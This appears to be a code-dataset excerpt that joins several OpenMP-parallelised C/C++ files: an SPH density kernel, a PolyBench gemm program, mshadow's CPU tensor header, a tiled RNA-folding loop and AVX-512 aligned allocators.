times[COMPUTE_BLOCKS*run+0] = t1-t0; // Time for compute morton Z 3d hash
times[COMPUTE_BLOCKS*run+1] = t2-t1; // Time for sorting the particles' hashes
times[COMPUTE_BLOCKS*run+2] = t3-t2; // Time for reordering all other arrays accordingly
times[COMPUTE_BLOCKS*run+3] = t4-t3; // Time for setting up the interval hash tables
times[COMPUTE_BLOCKS*run+4] = t5-t4; // Time for computing the SPH particle densities
return 0;
}
/*
* Function compute_density_3d_innerOmp:
* Computes the SPH density from the particles using cell linked list,
* with parallelization at the level of the outer-most loop of the chunk
* contribution calculation and vectorization in the inner-most loop.
*
* Arguments:
* N <int> : Number of SPH particles to be used in the run
* h <double> : Smoothing Length for the Smoothing Kernel w_bspline
* lsph <SPHparticle> : Array (pointer) of SPH particles to be updated
* Returns:
* 0 : error code returned
* lsph <SPHparticle> : SPH particle array is updated in the rho field by reference
*/
int compute_density_3d_innerOmp(int N, double h, SPHparticle *lsph, linkedListBox *box){
khiter_t kbegin,kend;
int64_t node_hash=-1,node_begin=0, node_end=0; // Start initializing the node indexes on the array
int64_t nb_begin= 0, nb_end = 0; // initialize the neighbor indexes
int64_t nblist[(2*box->width+1)*(2*box->width+1)*(2*box->width+1)]; // prepare a list of potential neighbor hashes
memset(lsph->rho,(int)0,N*sizeof(double)); // Pre-initialize the density to zero
for (kbegin = kh_begin(box->hbegin); kbegin != kh_end(box->hbegin); kbegin++){ // Iterate over each receiver cell begin index
if (kh_exist(box->hbegin, kbegin)){ // verify if that given iterator actually exists
kend = kh_get(1, box->hend, kh_key(box->hbegin, kbegin)); // Then get the end of the receiver cell iterator
node_hash = kh_key(box->hbegin, kbegin); // Then get the hash corresponding to it
node_begin = kh_value(box->hbegin, kbegin); // Get the receiver cell begin index in the array
node_end = kh_value(box->hend, kend); // Get the receiver cell end index in the array
neighbour_hash_3d(node_hash,nblist,box->width,box); // then find the hashes of its neighbors
for(int j=0;j<(2*box->width+1)*(2*box->width+1)*(2*box->width+1);j+=1){ // and the iterate over them
if(nblist[j]>=0){ // if a given neighbor actually has particles
nb_begin = kh_value(box->hbegin, kh_get(0, box->hbegin, nblist[j]) ); // then get the contributing cell begin index
nb_end = kh_value(box->hend , kh_get(1, box->hend , nblist[j]) ); // and get the contributing cell end index
compute_density_3d_chunk(node_begin,node_end,nb_begin,nb_end,h, // and compute the density contribution from
lsph->x,lsph->y,lsph->z,lsph->nu,lsph->rho); // the contributing cell to the receiver cell
}
}
}
}
return 0;
}
/*
* Function compute_density_3d_chunk:
* Computes the SPH density contribution for a pair of cells, from nb_ indexes
* to the node_ indexes. The computation is performed in parallel at the
* level of the node_ index, the outer-most, but with vectorization in
* the inner-most loop.
*
* Arguments:
* node_begin <int> : Begin index of the receiver cell
* node_end <int> : End index of the receiver cell
* nb_begin <int> : Begin index of the sender (neighbor) cell
* nb_end <int> : End index of the sender (neighbor) cell
* h <double> : Smoothing Length for the Smoothing Kernel w_bspline
* x <double*> : Array of particles' X positions
* y <double*> : Array of particles' Y positions
* z <double*> : Array of particles' Z positions
* nu <double*> : Array of particles' density weights (i.e. masses)
* Returns:
* 0 : error code returned
* rho <double*> : Array of particles' densities
*/
int compute_density_3d_chunk(int64_t node_begin, int64_t node_end,
int64_t nb_begin, int64_t nb_end,double h,
double* restrict x, double* restrict y,
double* restrict z, double* restrict nu,
double* restrict rho){
const double inv_h = 1./h;
const double kernel_constant = w_bspline_3d_constant(h);
#pragma omp parallel for // Execute the outer loop in parallel
for(int64_t ii=node_begin;ii<node_end;ii+=1){ // Iterate over the ii index of the chunk
double xii = x[ii]; // Load the X component of the ii particle position
double yii = y[ii]; // Load the Y component of the ii particle position
double zii = z[ii]; // Load the Z component of the ii particle position
double rhoii = 0.0; // Initialize the chunk contribution to density
#pragma omp simd // Hint at the compiler to vectorize
for(int64_t jj=nb_begin;jj<nb_end;jj+=1){ // Iterate over the each other particle in jj loop
double q = 0.; // Initialize the distance
double xij = xii-x[jj]; // Load and subtract jj particle's X position component
double yij = yii-y[jj]; // Load and subtract jj particle's Y position component
double zij = zii-z[jj]; // Load and subtract jj particle's Z position component
q += xij*xij; // Add the jj contribution to the ii distance in X
q += yij*yij; // Add the jj contribution to the ii distance in X
q += zij*zij; // Add the jj contribution to the ii distance in X
q = sqrt(q)*inv_h; // Sqrt to compute the distance
rhoii += nu[jj]*w_bspline_3d_simd(q); // Add up the contribution from the jj particle
} // to the intermediary density and then
rho[ii] += rhoii*kernel_constant; // add the intermediary density to the full density
}
return 0;
}
/*
* Function w_bspline_3d_constant:
* Returns the 3d normalization constant for the cubic b-spline SPH smoothing kernel
*
* Arguments:
* h <double> : Smoothing Length for the Smoothing Kernel w_bspline
* Returns:
* 3d bspline normalization density <double>
*/
double w_bspline_3d_constant(double h){
return 3./(2.*M_PI*h*h*h); // 3d normalization value for the b-spline kernel
}
/*
* Function w_bspline_3d_simd:
* Returns the un-normalized value of the cubic b-spline SPH smoothing kernel
*
* Arguments:
* q <double> : Distance between particles normalized by the smoothing length h
* Returns:
* wq <double> : Unnormalized value of the kernel
*
* Observation:
* Why not else if(q<2.)?
* Because if you use "else if", the compiler refuses to vectorize,
* This results in a large slowdown, as of 2.5x slower for example_04
*/
#pragma omp declare simd
double w_bspline_3d_simd(double q){
double wq=0;
double wq1 = (0.6666666666666666 - q*q + 0.5*q*q*q); // The first polynomial of the spline
double wq2 = 0.16666666666666666*(2.-q)*(2.-q)*(2.-q); // The second polynomial of the spline
if(q<2.) // If the distance is below 2
wq = wq2; // Use the 2nd polynomial for the spline
if(q<1.) // If the distance is below 1
wq = wq1; // Use the 1st polynomial for the spline
return wq; // return which ever value corresponds to the distance
} |
expected_output.c | #include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <math.h>
#include <polybench.h>
#include "gemm.h"
/**
* This version is stamped on May 10, 2016
*
* Contact:
* Louis-Noel Pouchet <pouchet.ohio-state.edu>
* Tomofumi Yuki <tomofumi.yuki.fr>
*
* Web address: http://polybench.sourceforge.net
*/
/*gemm.c: this file is part of PolyBench/C*/
/*Include polybench common header.*/
/*Include benchmark-specific header.*/
/*Array initialization.*/
static void init_array(int ni, int nj, int nk, double *alpha, double *beta, double C[1000][1100], double A[1000][1200], double B[1200][1100]) {
int i, j;
*alpha = 1.5;
*beta = 1.2;
for(i = 0; i < ni; i++)
for(j = 0; j < nj; j++)
C[i][j] = (double) ((i * j + 1) % ni) / ni;
for(i = 0; i < ni; i++)
for(j = 0; j < nk; j++)
A[i][j] = (double) (i * (j + 1) % nk) / nk;
for(i = 0; i < nk; i++)
for(j = 0; j < nj; j++)
B[i][j] = (double) (i * (j + 2) % nj) / nj;
}
/*DCE code. Must scan the entire live-out data.
Can be used also to check the correctness of the output.*/
static void print_array(int ni, int nj, double C[1000][1100]) {
int i, j;
fprintf(stderr, "==BEGIN DUMP_ARRAYS==\n");
fprintf(stderr, "begin dump: %s", "C");
for(i = 0; i < ni; i++)
for(j = 0; j < nj; j++) {
if((i * ni + j) % 20 == 0) fprintf(stderr, "\n");
fprintf(stderr, "%0.2lf ", C[i][j]);
}
fprintf(stderr, "\nend dump: %s\n", "C");
fprintf(stderr, "==END DUMP_ARRAYS==\n");
}
/*Main computational kernel. The whole function will be timed,
including the call and return.*/
static void kernel_gemm(int ni, int nj, int nk, double alpha, double beta, double C[1000][1100], double A[1000][1200], double B[1200][1100]) {
int i, j, k;
#pragma omp parallel for default(shared) private(i, j, k) firstprivate(ni, nj, beta, nk, alpha, A, B)
for(i = 0; i < ni; i++) {
// #pragma omp parallel for default(shared) private(j) firstprivate(nj, i, beta)
for(j = 0; j < nj; j++)
C[i][j] *= beta;
// #pragma omp parallel for default(shared) private(k, j) firstprivate(nk, nj, alpha, i, A, B)
for(k = 0; k < nk; k++) {
// #pragma omp parallel for default(shared) private(j) firstprivate(nj, alpha, i, k, A, B)
for(j = 0; j < nj; j++)
C[i][j] += alpha * A[i][k] * B[k][j];
}
}
}
int main(int argc, char **argv) {
/*Retrieve problem size.*/
int ni = 1000;
int nj = 1100;
int nk = 1200;
/*Variable declaration/allocation.*/
double alpha;
double beta;
double (*C)[1000][1100];
C = (double (*)[1000][1100]) polybench_alloc_data((1000 + 0) * (1100 + 0), sizeof(double));
;
double (*A)[1000][1200];
A = (double (*)[1000][1200]) polybench_alloc_data((1000 + 0) * (1200 + 0), sizeof(double));
;
double (*B)[1200][1100];
B = (double (*)[1200][1100]) polybench_alloc_data((1200 + 0) * (1100 + 0), sizeof(double));
;
/*Initialize array(s).*/
init_array(ni, nj, nk, &alpha, &beta, *C, *A, *B);
/*Start timer.*/
;
/*Run kernel.*/
kernel_gemm(ni, nj, nk, alpha, beta, *C, *A, *B);
/*Stop and print timer.*/
;
;
/*Prevent dead-code elimination. All live-out data must be printed
by the function call in argument.*/
if(argc > 42 && !strcmp(argv[0], "")) print_array(ni, nj, *C);
/*Be clean.*/
free((void *) C);
;
free((void *) A);
;
free((void *) B);
;
return 0;
}
|
tensor_cpu-inl.h | /*!
* Copyright (c) 2014 by Contributors
* \file tensor_cpu-inl.h
* \brief implementation of CPU host code
* \author Bing Xu, Tianqi Chen
*/
#ifndef MSHADOW_TENSOR_CPU_INL_H_
#define MSHADOW_TENSOR_CPU_INL_H_
#include <cstring>
#include <functional>
#include <utility>
#include <vector>
#include "./base.h"
#include "./tensor.h"
#include "./packet-inl.h"
#include "./dot_engine-inl.h"
namespace mshadow {
template<>
inline void InitTensorEngine<cpu>(int dev_id) {
}
template<>
inline void ShutdownTensorEngine<cpu>(void) {
}
template<>
inline void SetDevice<cpu>(int devid) {
}
template<>
inline Stream<cpu> *NewStream<cpu>(bool create_blas_handle,
bool create_dnn_handle) {
return new Stream<cpu>();
}
template<>
inline void DeleteStream<cpu>(Stream<cpu> *stream) {
delete stream;
}
template<int ndim>
inline std::ostream &operator<<(std::ostream &os, const Shape<ndim> &shape) { // NOLINT(*)
os << '(';
for (int i = 0; i < ndim; ++i) {
if (i != 0) os << ',';
os << shape[i];
}
// python style tuple
if (ndim == 1) os << ',';
os << ')';
return os;
}
template<typename xpu>
inline void *AllocHost_(size_t size);
template<typename xpu>
inline void FreeHost_(void * dptr);
#ifdef __CUDACC__
template<>
inline void *AllocHost_<gpu>(size_t size) {
void *dptr;
MSHADOW_CUDA_CALL(cudaMallocHost(&dptr, size, cudaHostAllocPortable));
return dptr;
}
template<>
inline void FreeHost_<gpu>(void *dptr) {
MSHADOW_CUDA_CALL(cudaFreeHost(dptr));
}
#endif
template<>
inline void *AllocHost_<cpu>(size_t size) {
size_t pitch;
return packet::AlignedMallocPitch(&pitch, size, 1);
}
template<>
inline void FreeHost_<cpu>(void *dptr) {
packet::AlignedFree(dptr);
}
template<typename xpu, int dim, typename DType>
inline void AllocHost(Tensor<cpu, dim, DType> *obj) {
obj->stride_ = obj->size(dim - 1);
CHECK_EQ(obj->CheckContiguous(), true) << "AllocHost";
void *dptr = AllocHost_<xpu>(obj->MSize() * sizeof(DType));
obj->dptr_ = reinterpret_cast<DType*>(dptr);
}
template<typename xpu, int dim, typename DType>
inline void FreeHost(Tensor<cpu, dim, DType> *obj) {
if (obj->dptr_ == NULL) {
LOG(FATAL) << "FreeHost:: double free";
}
FreeHost_<xpu>(obj->dptr_);
obj->dptr_ = NULL;
}
template<int dim, typename DType>
inline void AllocSpace(Tensor<cpu, dim, DType> *obj, bool pad) {
size_t pitch;
void *dptr;
if (pad) {
dptr = packet::AlignedMallocPitch
(&pitch, obj->size(dim - 1) * sizeof(DType), obj->shape_.FlatTo2D()[0]);
obj->stride_ = static_cast<index_t>(pitch / sizeof(DType));
} else {
obj->stride_ = obj->size(dim - 1);
dptr = packet::AlignedMallocPitch
(&pitch, obj->shape_.Size() * sizeof(DType), 1);
}
obj->dptr_ = reinterpret_cast<DType*>(dptr);
}
template<typename Device, typename DType, int dim>
inline Tensor<Device, dim, DType>
NewTensor(const Shape<dim> &shape, DType initv, bool pad, Stream<Device> *stream_) {
Tensor<Device, dim, DType> obj(shape);
obj.stream_ = stream_;
AllocSpace(&obj, pad);
MapExp<sv::saveto>(&obj, expr::ScalarExp<DType>(initv));
return obj;
}
template<int dim, typename DType>
inline void FreeSpace(Tensor<cpu, dim, DType> *obj) {
packet::AlignedFree(obj->dptr_);
obj->dptr_ = NULL;
}
template<int dim, typename DType>
inline void Copy(Tensor<cpu, dim, DType> _dst,
const Tensor<cpu, dim, DType> &_src,
Stream<cpu> *stream) {
CHECK_EQ(_dst.shape_, _src.shape_)
<< "Copy:shape mismatch:" << _dst.shape_ << " vs " << _src.shape_;
if (_dst.CheckContiguous() && _src.CheckContiguous()) {
memcpy(_dst.dptr_, _src.dptr_, sizeof(DType) * _dst.shape_.Size());
} else {
Tensor<cpu, 2, DType> dst = _dst.FlatTo2D();
Tensor<cpu, 2, DType> src = _src.FlatTo2D();
for (index_t y = 0; y < dst.size(0); ++y) {
memcpy(dst[y].dptr_, src[y].dptr_, sizeof(DType) * dst.size(1));
}
}
}
template<typename Saver, typename R, int dim,
typename DType, typename E>
inline void MapPlan(TRValue<R, cpu, dim, DType> *dst,
const expr::Plan<E, DType> &plan) {
Shape<2> shape = expr::ShapeCheck<dim, R>::Check(dst->self()).FlatTo2D();
expr::Plan<R, DType> dplan = expr::MakePlan(dst->self());
#if (MSHADOW_USE_CUDA == 0)
#pragma omp parallel for
#endif
// temp remove openmp, as default setting throttles CPU
for (openmp_index_t y = 0; y < shape[0]; ++y) {
for (index_t x = 0; x < shape[1]; ++x) {
// trust your compiler! -_- they will optimize it
Saver::template Save<DType>(dplan.REval(y, x), plan.Eval(y, x));
}
}
}
// code to handle SSE optimization
template<bool pass_check, typename Saver,
typename R, int dim,
typename DType, typename E, int etype>
struct MapExpCPUEngine {
inline static void Map(TRValue<R, cpu, dim, DType> *dst,
const expr::Exp<E, DType, etype> &exp) {
MapPlan<Saver>(dst, MakePlan(exp.self()));
}
};
template<typename SV, int dim, typename DType, typename E, int etype>
struct MapExpCPUEngine<true, SV, Tensor<cpu, dim, DType>,
dim, DType, E, etype> {
inline static void Map(Tensor<cpu, dim, DType> *dst,
const expr::Exp<E, DType, etype> &exp) {
if (expr::PacketAlignCheck<dim, E, MSHADOW_DEFAULT_PACKET>::Check(exp.self()) &&
expr::PacketAlignCheck<dim, Tensor<cpu, dim, DType>, MSHADOW_DEFAULT_PACKET>::Check(*dst)) {
expr::MapPacketPlan<SV>(dst->self(),
expr::MakePacketPlan<MSHADOW_DEFAULT_PACKET>(exp.self()));
} else {
MapPlan<SV>(dst, MakePlan(exp.self()));
}
}
};
template<typename Saver, typename R, int dim,
typename DType, typename E, int etype>
inline void MapExp(TRValue<R, cpu, dim, DType> *dst,
const expr::Exp<E, DType, etype> &exp) {
expr::TypeCheckPass<expr::TypeCheck<cpu, dim, DType, E>::kMapPass>
::Error_All_Tensor_in_Exp_Must_Have_Same_Type();
Shape<dim> eshape = expr::ShapeCheck<dim, E>::Check(exp.self());
Shape<dim> dshape = expr::ShapeCheck<dim, R>::Check(dst->self());
CHECK(eshape[0] == 0 || eshape == dshape)
<< "Assignment: Shape of Tensors are not consistent with target, "
<< "eshape: " << eshape << " dshape:" << dshape;
MapExpCPUEngine<expr::PacketCheck<E, MSHADOW_DEFAULT_PACKET>::kPass,
Saver, R, dim, DType, E, etype>
::Map(dst->ptrself(), exp);
}
template<typename Saver, typename Reducer,
typename R, typename DType, typename E, int etype>
inline void MapReduceKeepLowest(TRValue<R, cpu, 1, DType> *dst,
const expr::Exp<E, DType, etype> &exp,
DType scale) {
expr::TypeCheckPass<expr::TypeCheck<cpu, 1, DType, E>::kRedPass>
::Error_TypeCheck_Not_Pass_For_Reduce_Exp();
Shape<2> eshape = expr::ShapeCheck<expr::ExpInfo<E>::kDim, E>
::Check(exp.self()).FlatTo2D();
Shape<1> dshape = expr::ShapeCheck<1, R>::Check(dst->self());
CHECK_EQ(eshape[1], dshape[0]) << "MapReduceKeepLowest::reduction dimension do not match";
CHECK_NE(eshape[0], 0) << "can not reduce over empty tensor";
// execution
expr::Plan<R, DType> dplan = MakePlan(dst->self());
expr::Plan<E, DType> splan = MakePlan(exp.self());
#if (MSHADOW_USE_CUDA == 0)
#pragma omp parallel for
#endif
for (openmp_index_t x = 0; x < eshape[1]; ++x) {
DType res = splan.Eval(0, x);
for (index_t y = 1; y < eshape[0]; ++y) {
Reducer::Reduce(res, splan.Eval(y, x));
}
Saver::template Save<DType>(dplan.REval(0, x), res * scale);
}
}
template<typename Saver, typename Reducer, int dimkeep,
typename R, typename DType, typename E, int etype>
inline void MapReduceKeepHighDim(TRValue<R, cpu, 1, DType> *dst,
const expr::Exp<E, DType, etype> &exp,
DType scale) {
expr::TypeCheckPass<expr::TypeCheck<cpu, dimkeep, DType, E>::kRedPass>
::Error_TypeCheck_Not_Pass_For_Reduce_Exp();
typedef Shape<expr::ExpInfo<E>::kDim> EShape;
EShape eshape = expr::ShapeCheck<expr::ExpInfo<E>::kDim, E>
::Check(exp.self());
Shape<1> dshape = expr::ShapeCheck<1, R>::Check(dst->self());
CHECK_EQ(eshape[dimkeep], dshape[0])
<< "MapReduceKeepHighDim::reduction dimension do not match";
// use equvalent form
Shape<4> pshape = Shape4(eshape.ProdShape(0, dimkeep),
eshape[dimkeep],
eshape.ProdShape(dimkeep + 1, EShape::kSubdim),
eshape[EShape::kSubdim]);
// execution
expr::Plan<R, DType> dplan = MakePlan(dst->self());
expr::Plan<E, DType> splan = MakePlan(exp.self());
#if (MSHADOW_USE_CUDA == 0)
#pragma omp parallel for
#endif
for (openmp_index_t c = 0; c < pshape[1]; ++c) {
DType res; Reducer::SetInitValue(res);
for (index_t n = 0; n < pshape[0]; ++n) {
DType tres; Reducer::SetInitValue(tres);
for (index_t y = 0; y < pshape[2]; ++y) {
for (index_t x = 0; x < pshape[3]; ++x) {
Reducer::Reduce(tres,
splan.Eval((n * pshape[1] + c) * pshape[2] + y, x));
}
}
Reducer::Reduce(res, tres);
}
Saver::template Save<DType>(dplan.REval(0, c), DType(res * scale));
}
}
template<typename DType>
inline void Softmax(Tensor<cpu, 1, DType> dst,
const Tensor<cpu, 1, DType> &energy) {
DType mmax = energy[0];
for (index_t x = 1; x < dst.size(0); ++x) {
if (mmax < energy[x]) mmax = energy[x];
}
DType sum = DType(0.0f);
for (index_t x = 0; x < dst.size(0); ++x) {
dst[x] = std::exp(energy[x] - mmax);
sum += dst[x];
}
for (index_t x = 0; x < dst.size(0); ++x) {
dst[x] /= sum;
}
}
template<typename DType>
inline void SoftmaxGrad(Tensor<cpu, 2, DType> dst,
const Tensor<cpu, 2, DType> &src,
const Tensor<cpu, 1, DType> &label) {
#pragma omp parallel for
for (openmp_index_t y = 0; y < dst.size(0); ++y) {
const index_t k = static_cast<int>(label[y]);
for (index_t x = 0; x < dst.size(1); ++x) {
if (x == k) {
dst[y][k] = src[y][k] - 1.0f;
} else {
dst[y][x] = src[y][x];
}
}
}
}
template<typename DType>
inline void SoftmaxGrad(Tensor<cpu, 2, DType> dst,
const Tensor<cpu, 2, DType> &src,
const Tensor<cpu, 1, DType> &label,
const DType &ignore_label) {
#pragma omp parallel for
for (openmp_index_t y = 0; y < dst.size(0); ++y) {
const index_t k = static_cast<int>(label[y]);
for (index_t x = 0; x < dst.size(1); ++x) {
if (static_cast<int>(ignore_label) == k) {
dst[y][x] = 0.0f;
} else {
if (x == k) {
dst[y][k] = src[y][k] - 1.0f;
} else {
dst[y][x] = src[y][x];
}
}
}
}
}
template<typename DType>
inline void SoftmaxGrad(Tensor<cpu, 3, DType> dst,
const Tensor<cpu, 3, DType> &src,
const Tensor<cpu, 2, DType> &label) {
#pragma omp parallel for
for (openmp_index_t n = 0; n < dst.size(2); ++n) {
for (index_t y = 0; y < dst.size(0); ++y) {
const index_t k = static_cast<int>(label[y][n]);
for (index_t x = 0; x < dst.size(1); ++x) {
if (x == k) {
dst[y][k][n] = src[y][k][n] - 1.0f;
} else {
dst[y][x][n] = src[y][x][n];
}
}
}
}
}
template<typename DType>
inline void SoftmaxGrad(Tensor<cpu, 3, DType> dst,
const Tensor<cpu, 3, DType> &src,
const Tensor<cpu, 2, DType> &label,
const DType &ignore_label) {
#pragma omp parallel for
for (openmp_index_t n = 0; n < dst.size(2); ++n) {
for (index_t y = 0; y < dst.size(0); ++y) {
const index_t k = static_cast<int>(label[y][n]);
if (k == static_cast<int>(ignore_label)) {
for (index_t x = 0; x < dst.size(1); ++x) {
dst[y][x][n] = DType(0.0f);
}
} else {
for (index_t x = 0; x < dst.size(1); ++x) {
if (x == k) {
dst[y][k][n] = src[y][k][n] - 1.0f;
} else {
dst[y][x][n] = src[y][x][n];
}
}
}
}
}
}
template<typename DType>
inline void Softmax(Tensor<cpu, 2, DType> dst,
const Tensor<cpu, 2, DType> &energy) {
CHECK_EQ(dst.shape_, energy.shape_) << "Softmax: shape mismatch";
#pragma omp parallel for
for (openmp_index_t y = 0; y < dst.size(0); ++y) {
Softmax(dst[y], energy[y]);
}
}
template<typename DType>
inline void Softmax(Tensor<cpu, 3, DType> dst,
const Tensor<cpu, 3, DType> &energy) {
CHECK_EQ(dst.shape_, energy.shape_) << "Softmax: shape mismatch";
#pragma omp parallel for
for (openmp_index_t y = 0; y < dst.size(0); ++y) {
for (index_t n = 0; n < dst.size(2); ++n) {
DType mmax = energy[y][0][n];
for (index_t x = 1; x < dst.size(1); ++x) {
if (mmax < energy[y][x][n]) mmax = energy[y][x][n];
}
DType sum = DType(0.0f);
for (index_t x = 0; x < dst.size(1); ++x) {
dst[y][x][n] = std::exp(energy[y][x][n] - mmax);
sum += dst[y][x][n];
}
for (index_t x = 0; x < dst.size(1); ++x) {
dst[y][x][n] /= sum;
}
}
}
}
template<typename IndexType, typename DType>
inline void AddTakeGrad(Tensor<cpu, 2, DType> dst,
const Tensor<cpu, 1, IndexType>& index,
const Tensor<cpu, 2, DType> &src) {
for (index_t y = 0; y < index.size(0); ++y) {
dst[index[y]] += src[y];
}
}
template<typename IndexType, typename DType>
inline void AddTakeGradLargeBatch(Tensor<cpu, 2, DType> dst,
const Tensor<cpu, 1, IndexType>& sorted,
const Tensor<cpu, 1, IndexType>& index,
const Tensor<cpu, 2, DType> &src) {
for (index_t y = 0; y < sorted.size(0); ++y) {
dst[sorted[y]] += src[index[y]];
}
}
template<typename IndexType, typename DType>
inline void IndexFill(Tensor<cpu, 2, DType> dst,
const Tensor<cpu, 1, IndexType>& index,
const Tensor<cpu, 2, DType> &src) {
for (index_t y = 0; y < index.size(0); ++y) {
for (index_t j = 0; j < src.size(1); j++) {
dst[index[y]][j] = src[y][j];
}
}
}
template<typename KDType, typename VDType>
inline void SortByKey(Tensor<cpu, 1, KDType> keys, Tensor<cpu, 1, VDType> values,
bool is_ascend) {
CHECK_EQ(keys.CheckContiguous(), true);
CHECK_EQ(values.CheckContiguous(), true);
CHECK_EQ(keys.size(0), values.size(0))
<< "The sizes of key/value are not equal! keys_size: " << keys.size(0)
<< "values_size: " << values.size(0);
std::vector<size_t> idx(keys.size(0));
std::vector<KDType> keys_vec(keys.size(0));
std::vector<VDType> values_vec(values.size(0));
for (int i = 0; i < keys.size(0); i++) {
idx[i] = i;
keys_vec[i] = keys[i];
values_vec[i] = values[i];
}
if (is_ascend) {
std::stable_sort(idx.begin(), idx.end(),
[&keys_vec](size_t i1, size_t i2)
{return keys_vec[i1] < keys_vec[i2]; });
} else {
std::stable_sort(idx.begin(), idx.end(),
[&keys_vec](size_t i1, size_t i2)
{return keys_vec[i1] > keys_vec[i2]; });
}
for (index_t i = 0; i < values.size(0); i++) {
keys[i] = keys_vec[idx[i]];
values[i] = values_vec[idx[i]];
}
}
template<typename Device, typename VDType, typename SDType>
inline void VectorizedSort(Tensor<Device, 1, VDType> values, Tensor<Device, 1, SDType> segments) {
// We can sort each segments using two stable sorts
SortByKey(values, segments, true);
SortByKey(segments, values, true);
}
// blas related
template<typename Device, typename DType>
inline void VectorDot(Tensor<Device, 1, DType> dst,
const Tensor<Device, 1, DType> &lhs,
const Tensor<Device, 1, DType> &rhs) {
CHECK_EQ(lhs.size(0), rhs.size(0))
<< "VectorDot: Shape mismatch";
CHECK_EQ(dst.size(0), 1U)
<< "VectorDot: expect dst to be scalar";
expr::BLASEngine<Device, DType>::SetStream(lhs.stream_);
mshadow::expr::BLASEngine<Device, DType>::dot(
lhs.stream_, lhs.size(0), lhs.dptr_, 1, rhs.dptr_, 1, dst.dptr_);
}
template<bool transpose_left, bool transpose_right, typename Device, typename DType>
inline void BatchGEMM(Tensor<Device, 3, DType> dst,
const Tensor<Device, 3, DType> &lhs,
const Tensor<Device, 3, DType> &rhs,
DType alpha,
DType beta,
Tensor<Device, 1, DType*> workspace) {
index_t batch_size = dst.shape_[0];
expr::BLASEngine<Device, DType>::SetStream(dst.stream_);
Shape<3> sleft = transpose_left ? Shape3(lhs.shape_[0], lhs.shape_[2], lhs.shape_[1])
: lhs.shape_;
Shape<3> sright = transpose_right ? Shape3(rhs.shape_[0], rhs.shape_[2], rhs.shape_[1])
: rhs.shape_;
CHECK_EQ(dst.CheckContiguous(), true);
CHECK_EQ(lhs.CheckContiguous(), true);
CHECK_EQ(rhs.CheckContiguous(), true);
CHECK(sleft[0] == batch_size && sright[0] == batch_size)
<< "BatchGEMM: batchsize must be equal."
<< "dst: " << dst.shape_ << "\n"
<< "lhs: " << sleft << "\n"
<< "rhs: " << sright << "\n";
CHECK(dst.size(1) == sleft[1] && dst.size(2) == sright[2] && sleft[2] == sright[1])
<< "BatchGEMM: matrix shape mismatch"
<< "dst: " << dst.shape_ << "\n"
<< "lhs: " << sleft << "\n"
<< "rhs: " << sright << "\n";
CHECK(workspace.size(0) >= 3 * batch_size)
<< "Workspace Size must be bigger than " << 3 * batch_size;
CHECK_EQ(workspace.CheckContiguous(), true);
// use column major argument to compatible with most BLAS
expr::BLASEngine<Device, DType>::batched_gemm
(dst.stream_,
transpose_right, transpose_left,
transpose_right ? rhs.size(1) : rhs.size(2),
transpose_left ? lhs.size(2) : lhs.size(1),
transpose_right ? rhs.size(2) : rhs.size(1),
alpha,
rhs.dptr_, rhs.stride_,
lhs.dptr_, lhs.stride_,
beta,
dst.dptr_, dst.stride_, batch_size,
workspace.dptr_);
}
} // namespace mshadow
#endif // MSHADOW_TENSOR_CPU_INL_H_
|
tilecorr.h | void tilecorr()
{
int c0,c1,c2,c3,c5,c6,c7,c9,c11,c10,c4,c12;
for( c1 = 1; c1 < N + floord(N - 2, 128); c1 += 1)
#pragma omp parallel for schedule(dynamic, 1)
for( c3 = max(0, -N + c1 + 1); c3 <= (c1 - 1) / 129; c3 += 1)
for( c4 = 0; c4 <= 1; c4 += 1) {
if (c4 == 1) {
for( c9 = N - c1 + 129 * c3; c9 <= min(N - 1, N - c1 + 129 * c3 + 127); c9 += 1)
for( c10 = max(0, N - c1 + 129 * c3 - c9 + 1); c10 <= 1; c10 += 1) {
if (c10 == 1) {
S[(N-c1+c3-1)][c9] = MAX(S[(N-c1+c3-1)][c9], S[(N-c1+c3-1)+1][c9-1] + can_pair(RNA, (N-c1+c3-1), c9));
} else
for( c11 = 128 * c3 + 1; c11 <= -N + c1 - c3 + c9; c11 += 1)
S[(N-c1+c3-1)][c9] = MAX(S[(N-c1+c3-1)][c11+(N-c1+c3-1)] + S[c11+(N-c1+c3-1)+1][c9], S[(N-c1+c3-1)][c9]);
}
} else
for( c5 = 0; c5 <= 8 * c3; c5 += 1)
for( c9 = N - c1 + 129 * c3; c9 <= min(N - 1, N - c1 + 129 * c3 + 127); c9 += 1)
for( c11 = 16 * c5; c11 <= min(128 * c3, 16 * c5 + 15); c11 += 1)
S[(N-c1+c3-1)][c9] = MAX(S[(N-c1+c3-1)][c11+(N-c1+c3-1)] + S[c11+(N-c1+c3-1)+1][c9], S[(N-c1+c3-1)][c9]);
}
}
|
aalloc.c | #include "aalloc.h"
fint salloc2_(const fnat m[static restrict 1], const fnat n[static restrict 1], float **const restrict A, fnat ldA[static restrict 1])
{
if (A)
*A = (float*)NULL;
*ldA = 0u;
if (!*m)
return 0;
if (!*n)
return 0;
const fnat k = *m & VSL_1;
*ldA = (k ? (*m + (VSL - k)) : *m);
if (A) {
const size_t s = (*n) * ((*ldA) * sizeof(float));
*A = (float*)aligned_alloc(VA, s);
if (!*A)
return -3;
#ifdef _OPENMP
#pragma omp parallel for default(none) shared(n,A,ldA)
#endif /* ?_OPENMP */
for (fnat j = 0u; j < *n; ++j) {
register const VS z = _mm512_setzero_ps();
float *const Aj = *A + j * (size_t)(*ldA);
for (fnat i = 0u; i < *ldA; i += VSL)
_mm512_store_ps((Aj + i), z);
}
}
#ifdef _OPENMP
return 1;
#else /* !_OPENMP */
return 0;
#endif /* ?_OPENMP */
}
fint dalloc2_(const fnat m[static restrict 1], const fnat n[static restrict 1], double **const restrict A, fnat ldA[static restrict 1])
{
if (A)
*A = (double*)NULL;
*ldA = 0u;
if (!*m)
return 0;
if (!*n)
return 0;
const fnat k = *m & VDL_1;
*ldA = (k ? (*m + (VDL - k)) : *m);
if (A) {
const size_t s = (*n) * ((*ldA) * sizeof(double));
*A = (double*)aligned_alloc(VA, s);
if (!*A)
return -3;
#ifdef _OPENMP
#pragma omp parallel for default(none) shared(n,A,ldA)
#endif /* ?_OPENMP */
for (fnat j = 0u; j < *n; ++j) {
register const VD z = _mm512_setzero_pd();
double *const Aj = *A + j * (size_t)(*ldA);
for (fnat i = 0u; i < *ldA; i += VDL)
_mm512_store_pd((Aj + i), z);
}
}
#ifdef _OPENMP
return 1;
#else /* !_OPENMP */
return 0;
#endif /* ?_OPENMP */
}
